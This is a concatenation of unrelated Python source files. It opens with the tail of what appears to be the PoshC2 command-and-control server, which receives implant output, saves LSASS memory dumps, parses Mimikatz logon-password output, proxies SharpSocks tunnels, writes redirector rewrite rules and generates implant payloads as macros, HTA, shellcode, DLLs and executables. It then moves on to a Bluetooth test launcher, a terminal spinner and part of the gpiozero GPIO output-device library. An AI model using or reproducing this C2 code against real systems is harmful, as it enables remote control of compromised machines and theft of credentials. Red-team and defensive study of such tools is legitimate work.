chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename)):
counter = 1
while(os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s/downloads/%s' % (ROOTDIR, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumppath = "%sSafetyDump-Task-%s.bin" % (DownloadsDirectory, taskIdStr)
open(dumppath, 'wb').write(base64.b64decode(rawoutput))
message = "Dump written to: %s" % dumppath
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except URLError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except HTTPError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] HTTPError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
if __name__ == '__main__':
httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print("Using existing database / project" + Colours.GREEN)
C2 = get_c2server_all()
if ((C2[1] == HostnameIP) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (ROOTDIR)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % ROOTDIR):
import shutil
shutil.rmtree("%spayloads_old" % ROOTDIR)
os.rename("%spayloads" % ROOTDIR, "%spayloads_old" % ROOTDIR)
os.makedirs("%spayloads" % ROOTDIR)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(ROOTDIR)
if not os.path.exists(directory):
os.makedirs(directory)
os.makedirs("%s/downloads" % directory)
os.makedirs("%s/reports" % directory)
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(HostnameIP, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, ROOTDIR, ServerPort, QuickCommand, DownloadURI, "", "", "", Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken, APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("HostnameIP", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % ROOTDIR)
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (HOST_NAME, PORT_NUMBER))
print(Colours.END)
if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (HOST_NAME, PORT_NUMBER))
sys.exit(0)
|
test1.py
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
#startBackGroundEvents.start()
startTests.main()
|
activity_indicator.py
|
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
class ActivityIndicator:
"""NOTE: Don't put anything to stdout while this indicator is active."""
def __init__(self, message: str):
self.message = message
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.interval = 1 / len(self.steps)
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for step in cycle(self.steps):
if self.done:
break
print(f"\r{self.message} {step}", flush=True, end="")
sleep(self.interval)
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="\r", flush=True)
def __enter__(self):
        self.start()
        return self  # return the indicator so "with ActivityIndicator(...) as ai:" binds correctly
def __exit__(self, exc_type, exc_value, exc_tb):
self.stop()
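# Illustrative usage sketch (not part of the original module): the indicator is
# meant to wrap a long-running task as a context manager so it always stops,
# even if the wrapped code raises. The sleep() below is a hypothetical stand-in
# for real work.
if __name__ == "__main__":
    with ActivityIndicator("Crunching numbers..."):
        sleep(3)  # stand-in for the actual long-running task
    print("Done.")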
|
output_devices.py
|
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2015-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2015-2019 Ben Nuttall <ben@bennuttall.com>
# Copyright (c) 2019 tuftii <3215045+tuftii@users.noreply.github.com>
# Copyright (c) 2019 tuftii <pi@raspberrypi>
# Copyright (c) 2016 Ian Harcombe <ian.harcombe@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
str = type('')
from threading import Lock
from itertools import repeat, cycle, chain
from colorzero import Color
from collections import OrderedDict
try:
from math import log2
except ImportError:
from .compat import log2
from .exc import OutputDeviceBadValue, GPIOPinMissing
from .devices import GPIODevice, Device, CompositeDevice
from .mixins import SourceMixin
from .threads import GPIOThread
from .tones import Tone
class OutputDevice(SourceMixin, GPIODevice):
"""
Represents a generic GPIO output device.
This class extends :class:`GPIODevice` to add facilities common to GPIO
output devices: an :meth:`on` method to switch the device on, a
corresponding :meth:`off` method, and a :meth:`toggle` method.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
super(OutputDevice, self).__init__(pin, pin_factory=pin_factory)
self._lock = Lock()
self.active_high = active_high
if initial_value is None:
self.pin.function = 'output'
else:
self.pin.output_with_state(self._value_to_state(initial_value))
def _value_to_state(self, value):
return bool(self._active_state if value else self._inactive_state)
def _write(self, value):
try:
self.pin.state = self._value_to_state(value)
except AttributeError:
self._check_open()
raise
def on(self):
"""
Turns the device on.
"""
self._write(True)
def off(self):
"""
Turns the device off.
"""
self._write(False)
def toggle(self):
"""
Reverse the state of the device. If it's on, turn it off; if it's off,
turn it on.
"""
with self._lock:
if self.is_active:
self.off()
else:
self.on()
@property
def value(self):
"""
Returns 1 if the device is currently active and 0 otherwise. Setting
this property changes the state of the device.
"""
return super(OutputDevice, self).value
@value.setter
def value(self, value):
self._write(value)
@property
def active_high(self):
"""
When :data:`True`, the :attr:`value` property is :data:`True` when the
device's :attr:`~GPIODevice.pin` is high. When :data:`False` the
:attr:`value` property is :data:`True` when the device's pin is low
(i.e. the value is inverted).
This property can be set after construction; be warned that changing it
will invert :attr:`value` (i.e. changing this property doesn't change
the device's pin state - it just changes how that state is
interpreted).
"""
return self._active_state
@active_high.setter
def active_high(self, value):
self._active_state = True if value else False
self._inactive_state = False if value else True
def __repr__(self):
try:
return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % (
self.__class__.__name__, self.pin, self.active_high, self.is_active)
except:
return super(OutputDevice, self).__repr__()
class DigitalOutputDevice(OutputDevice):
"""
Represents a generic output device with typical on/off behaviour.
This class extends :class:`OutputDevice` with a :meth:`blink` method which
uses an optional background thread to handle toggling the device state
without further interaction.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
self._blink_thread = None
self._controller = None
super(DigitalOutputDevice, self).__init__(
pin, active_high, initial_value, pin_factory=pin_factory
)
@property
def value(self):
return super(DigitalOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def close(self):
self._stop_blink()
super(DigitalOutputDevice, self).close()
def on(self):
self._stop_blink()
self._write(True)
def off(self):
self._stop_blink()
self._write(False)
def blink(self, on_time=1, off_time=1, n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device, args=(on_time, off_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def _stop_blink(self):
if getattr(self, '_controller', None):
self._controller._stop_blink(self)
self._controller = None
if getattr(self, '_blink_thread', None):
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(self, on_time, off_time, n):
iterable = repeat(0) if n is None else repeat(0, n)
for _ in iterable:
self._write(True)
if self._blink_thread.stopping.wait(on_time):
break
self._write(False)
if self._blink_thread.stopping.wait(off_time):
break
class LED(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a light emitting diode
(LED).
Connect the cathode (short leg, flat side) of the LED to a ground pin;
connect the anode (longer leg) to a limiting resistor; connect the other
side of the limiting resistor to a GPIO pin (the limiting resistor can be
placed either side of the LED).
The following example will light the LED::
from gpiozero import LED
led = LED(17)
led.on()
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the LED will operate normally with the
circuit described above. If :data:`False` you should wire the cathode
to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the LED will be off initially. If
:data:`None`, the LED will be left in whatever state the pin is found
in when configured for output (warning: this can be on). If
:data:`True`, the LED will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
LED.is_lit = LED.is_active
class Buzzer(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a digital buzzer
component.
.. note::
This interface is only capable of simple on/off commands, and is not
capable of playing a variety of tones (see :class:`TonalBuzzer`).
Connect the cathode (negative pin) of the buzzer to a ground pin; connect
the other side to any GPIO pin.
The following example will sound the buzzer::
from gpiozero import Buzzer
bz = Buzzer(3)
bz.on()
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the buzzer will operate normally with
the circuit described above. If :data:`False` you should wire the
cathode to the GPIO pin, and the anode to a 3V3 pin.
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the buzzer will be silent initially. If
:data:`None`, the buzzer will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the buzzer will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
Buzzer.beep = Buzzer.blink
class PWMOutputDevice(OutputDevice):
"""
Generic output device configured for pulse-width modulation (PWM).
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If 0 (the default), the device's duty cycle will be 0 initially.
Other values between 0 and 1 can be specified as an initial duty cycle.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the device. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=0, frequency=100,
pin_factory=None):
self._blink_thread = None
self._controller = None
if not 0 <= initial_value <= 1:
raise OutputDeviceBadValue("initial_value must be between 0 and 1")
super(PWMOutputDevice, self).__init__(
pin, active_high, initial_value=None, pin_factory=pin_factory
)
try:
# XXX need a way of setting these together
self.pin.frequency = frequency
self.value = initial_value
except:
self.close()
raise
def close(self):
try:
self._stop_blink()
except AttributeError:
pass
try:
self.pin.frequency = None
except AttributeError:
# If the pin's already None, ignore the exception
pass
super(PWMOutputDevice, self).close()
def _state_to_value(self, state):
return float(state if self.active_high else 1 - state)
def _value_to_state(self, value):
return float(value if self.active_high else 1 - value)
def _write(self, value):
if not 0 <= value <= 1:
raise OutputDeviceBadValue("PWM value must be between 0 and 1")
super(PWMOutputDevice, self)._write(value)
@property
def value(self):
"""
The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values
in between may be specified for varying levels of power in the device.
"""
return super(PWMOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def on(self):
self._stop_blink()
self._write(1)
def off(self):
self._stop_blink()
self._write(0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is
1.0). If the device has a duty cycle (:attr:`value`) of 0.1, this will
toggle it to 0.9, and so on.
"""
self._stop_blink()
self.value = 1 - self.value
@property
def is_active(self):
"""
Returns :data:`True` if the device is currently active (:attr:`value`
is non-zero) and :data:`False` otherwise.
"""
return self.value != 0
@property
def frequency(self):
"""
The frequency of the pulses used with the PWM device, in Hz. The
default is 100Hz.
"""
return self.pin.frequency
@frequency.setter
def frequency(self, value):
self.pin.frequency = value
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(on_time, off_time, fade_in_time, fade_out_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time, n, background
)
def _stop_blink(self):
if self._controller:
self._controller._stop_blink(self)
self._controller = None
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25):
sequence = []
if fade_in_time > 0:
sequence += [
(i * (1 / fps) / fade_in_time, 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((1, on_time))
if fade_out_time > 0:
sequence += [
(1 - (i * (1 / fps) / fade_out_time), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((0, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for value, delay in sequence:
self._write(value)
if self._blink_thread.stopping.wait(delay):
break
class TonalBuzzer(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a tonal buzzer.
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If :data:`None` (the default), the buzzer will be off initially. Values
between -1 and 1 can be specified as an initial value for the buzzer.
:type mid_tone: int or str
:param mid_tone:
        The tone which is represented by the device's middle value (0). The
default is "A4" (MIDI note 69).
:param int octaves:
The number of octaves to allow away from the base note. The default is
1, meaning a value of -1 goes one octave below the base note, and one
above, i.e. from A3 to A5 with the default base note of A4.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. note::
Note that this class does not currently work with
:class:`~gpiozero.pins.pigpio.PiGPIOFactory`.
"""
def __init__(self, pin=None, initial_value=None, mid_tone=Tone("A4"),
octaves=1, pin_factory=None):
self._mid_tone = None
super(TonalBuzzer, self).__init__(
pwm_device=PWMOutputDevice(
pin=pin, pin_factory=pin_factory
), pin_factory=pin_factory)
try:
self._mid_tone = Tone(mid_tone)
if not (0 < octaves <= 9):
raise ValueError('octaves must be between 1 and 9')
self._octaves = octaves
try:
self.min_tone.note
except ValueError:
raise ValueError(
'%r is too low for %d octaves' %
(self._mid_tone, self._octaves))
try:
self.max_tone.note
except ValueError:
raise ValueError(
'%r is too high for %d octaves' %
(self._mid_tone, self._octaves))
self.value = initial_value
except:
self.close()
raise
def __repr__(self):
try:
if self.value is None:
return '<gpiozero.TonalBuzzer object on pin %r, silent>' % (
self.pwm_device.pin,)
else:
return '<gpiozero.TonalBuzzer object on pin %r, playing %s>' % (
self.pwm_device.pin, self.tone.note)
except:
return super(TonalBuzzer, self).__repr__()
def play(self, tone):
"""
Play the given *tone*. This can either be an instance of
:class:`~gpiozero.tones.Tone` or can be anything that could be used to
construct an instance of :class:`~gpiozero.tones.Tone`.
For example::
>>> from gpiozero import TonalBuzzer
>>> from gpiozero.tones import Tone
>>> b = TonalBuzzer(17)
>>> b.play(Tone("A4"))
>>> b.play(Tone(220.0)) # Hz
>>> b.play(Tone(60)) # middle C in MIDI notation
>>> b.play("A4")
>>> b.play(220.0)
>>> b.play(60)
"""
if tone is None:
self.value = None
else:
if not isinstance(tone, Tone):
tone = Tone(tone)
freq = tone.frequency
if self.min_tone.frequency <= tone <= self.max_tone.frequency:
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise ValueError("tone is out of the device's range")
def stop(self):
"""
Turn the buzzer off. This is equivalent to setting :attr:`value` to
:data:`None`.
"""
self.value = None
@property
def tone(self):
"""
Returns the :class:`~gpiozero.tones.Tone` that the buzzer is currently
playing, or :data:`None` if the buzzer is silent. This property can
also be set to play the specified tone.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return Tone.from_frequency(self.pwm_device.pin.frequency)
@tone.setter
def tone(self, value):
self.play(value)
@property
def value(self):
"""
Represents the state of the buzzer as a value between -1 (representing
the minimum tone) and 1 (representing the maximum tone). This can also
be the special value :data:`None` indicating that the buzzer is
currently silent.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
try:
return log2(
self.pwm_device.pin.frequency / self.mid_tone.frequency
) / self.octaves
except ZeroDivisionError:
return 0.0
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
freq = self.mid_tone.frequency * 2 ** (self.octaves * value)
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise OutputDeviceBadValue(
'TonalBuzzer value must be between -1 and 1, or None')
@property
def is_active(self):
"""
Returns :data:`True` if the buzzer is currently playing, otherwise
:data:`False`.
"""
return self.value is not None
@property
def octaves(self):
"""
The number of octaves available (above and below mid_tone).
"""
return self._octaves
@property
def min_tone(self):
"""
The lowest tone that the buzzer can play, i.e. the tone played
when :attr:`value` is -1.
"""
return self._mid_tone.down(12 * self.octaves)
@property
